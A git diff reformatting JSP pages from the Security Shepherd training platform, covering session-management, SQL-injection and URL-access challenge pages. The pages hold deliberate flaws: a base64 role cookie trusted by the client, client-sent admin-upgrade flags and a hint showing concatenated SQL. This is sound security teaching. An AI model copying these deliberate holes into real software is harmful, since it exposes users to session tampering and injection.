+							<option value="e4da3b7fbbce2345d7772b0674a318d5">Orla
+								Cleary</option>
+							<option value="8f14e45fceea167a5a36dedd4bea2543">Ronan
+								Fitzpatrick</option>
+							<option value="6512bd43d9caa6e02c990b0a82652dca">Pat
+								McKenana</option>
+						</select>
+						</td>
+					</tr>
+					<tr>
+						<td>
+							<div id="submitButton">
+								<input style='width: 300px;' type="submit"
+									value="Show this profile" />
+							</div>
+							<p style="display: none; text-align: center;" id="loadingSign">Loading...</p>
+						</td>
+					</tr>
+				</table>
+			</form>
+		</center>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var optionValue = $("#userId").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c",
+						data: {
+							userId: optionValue
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> An Error Occurred: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a.jsp b/src/main/webapp/challenges/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a.jsp
index 16ae313c3..8ee36fa48 100644
--- a/src/main/webapp/challenges/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a.jsp
+++ b/src/main/webapp/challenges/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a.jsp
@@ -1,152 +1,160 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * Broken Authentication and Session Management Challenge One
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
-    String levelHash = "dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a";
-    String levelName = "Session Management Challenge One";
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-
+/**
+ * Broken Authentication and Session Management Challenge One
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
+String levelHash = "dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a";
+String levelName = "Session Management Challenge One";
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+	
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.sessionManagement." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.sessionManagement." + levelHash, locale);
 //Used more than once translations
-    String translatedLevelName = bundle.getString("challenge.challengeName");
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+String translatedLevelName = bundle.getString("challenge.challengeName");
+	
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-        <br/>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.adminButton") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.form.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
-
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    var counter = 0;
-    $("#leForm").submit(function () {
-        counter = counter + 1;
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            document.cookie = "checksum=dXNlclJvbGU9dXNlcg==";
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    adminDetected: "false",
-                    returnPassword: "false",
-                    upgradeUserToAdmin: "false"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-    $("#aUserName").change(function () {
-        $("#userContent").text($(this).val());
-    }).change();
-    $("#theHintButton").click(function () {
-        $("#hintButton").hide("fast", function () {
-            $("#hint").show("fast");
-        });
-    });
-    ;
-
-    $('#hideLesson').click(function () {
-        $("#lessonIntro").hide("slow", function () {
-            $("#showLesson").show("fast");
-        });
-    });
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+			<br />
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.adminButton") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.form.loading") %></p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    $("#showLesson").click(function () {
-        $('#showLesson').hide("fast", function () {
-            $("#lessonIntro").show("slow");
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			var counter = 0;
+			$("#leForm").submit(function(){
+				counter = counter + 1;
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					document.cookie="checksum=dXNlclJvbGU9dXNlcg==";
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							adminDetected: "false",
+							returnPassword: "false",
+							upgradeUserToAdmin: "false"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+			$("#aUserName").change(function () {
+				$("#userContent").text($(this).val());
+			}).change();
+			$("#theHintButton").click(function() {
+				$("#hintButton").hide("fast", function(){
+					$("#hint").show("fast");
+				});
+			});;
+			
+			$('#hideLesson').click(function(){
+				$("#lessonIntro").hide("slow", function(){
+					$("#showLesson").show("fast");
+				});
+			});
+			
+			$("#showLesson").click(function(){
+				$('#showLesson').hide("fast", function(){
+					$("#lessonIntro").show("slow");
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a.jsp b/src/main/webapp/challenges/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a.jsp
index f5acc3e33..d8a7180a5 100644
--- a/src/main/webapp/challenges/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a.jsp
+++ b/src/main/webapp/challenges/e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a.jsp
@@ -1,166 +1,174 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * SQL Injection Challenge One
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * SQL Injection Challenge One
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 
-    String levelName = "SQL Injection Challenge One";
-    String levelHash = "e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a";
+String levelName = "SQL Injection Challenge One";
+String levelHash = "e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
 //Used more than once translations
-    String i18nLevelName = bundle.getString("challenge.challengeName");
+String i18nLevelName = bundle.getString("challenge.challengeName");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-    <div id="hint" style="display: none;">
-        <h2 class="title"><%= bundle.getString("challenge.hint") %>
-        </h2>
-        <%= bundle.getString("challenge.hint.description") %>... <br/> <br/>
-        <div>
-            SELECT * FROM customers WHERE customerId =&quot;<a id="userContent"></a>&quot;;
-        </div>
-        <br/> <br/>
-    </div>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+		<div id="hint" style="display: none;">
+			<h2 class="title"><%= bundle.getString("challenge.hint") %></h2>
+			<%= bundle.getString("challenge.hint.description") %>... <br /> <br />
+			<div>
+				SELECT * FROM customers WHERE customerId =&quot;<a id="userContent"></a>&quot;;
+			</div>
+			<br /> <br />
+		</div>
 
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.form.pleaseEnter") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="aUserId" type="text"
-                           autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.button.value") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button" value="<%= bundle.getString("sign.hint") %>"
-                               id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.form.pleaseEnter") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="aUserId" type="text"
+						autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.button.value") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
+						</p>
+						<div style="display: none;" id="hintButton">
+							<input type="button" value="<%= bundle.getString("sign.hint") %>"
+								id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    var counter = 0;
-    $("#leForm").submit(function () {
-        counter = counter + 1;
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#userContent").text($("#aUserId").val());
-        var theName = $("#aUserId").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a",
-                data: {
-                    aUserId: theName
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                    if (counter == 3) {
-                        $("#hintButton").show("slow");
-                    }
-                });
-            });
-        });
-    });
-    $("#aUserId").change(function () {
-        $("#userContent").text($(this).val());
-    }).change();
-    $("#theHintButton").click(function () {
-        $("#hintButton").hide("fast", function () {
-            $("#hint").show("fast");
-        });
-    });
-    ;
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			var counter = 0;
+			$("#leForm").submit(function(){
+				counter = counter + 1;
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#userContent").text($("#aUserId").val());
+				var theName = $("#aUserId").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a",
+						data: {
+							aUserId: theName
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+							if (counter == 3)
+							{
+								$("#hintButton").show("slow");
+							}
+						});
+					});
+				});
+			});
+			$("#aUserId").change(function () {
+				$("#userContent").text($(this).val());
+			}).change();
+			$("#theHintButton").click(function() {
+				$("#hintButton").hide("fast", function(){
+					$("#hint").show("fast");
+				});
+			});;
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4.jsp b/src/main/webapp/challenges/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4.jsp
index 2a84f8417..7663e4294 100644
--- a/src/main/webapp/challenges/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4.jsp
+++ b/src/main/webapp/challenges/e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4.jsp
@@ -1,176 +1,187 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * Failure to Restrict URL Access 3
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * Failure to Restrict URL Access 3
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 
-    String levelName = "Failure to Restrict URL Access 3";
-    String levelHash = new String("e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4");
+ String levelName = "Failure to Restrict URL Access 3";
+ String levelHash = new String("e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4");
 
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.urlAccess." + levelHash, locale);
+ //Translation Stuff
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.urlAccess." + levelHash, locale);
 //Used more than once translations
-    String translatedLevelName = bundle.getString("challenge.challengeName");
+String translatedLevelName = bundle.getString("challenge.challengeName");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-        <br/>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.adminButton") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+			<br />
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.adminButton") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %></p>
+					</td>
+				</tr>
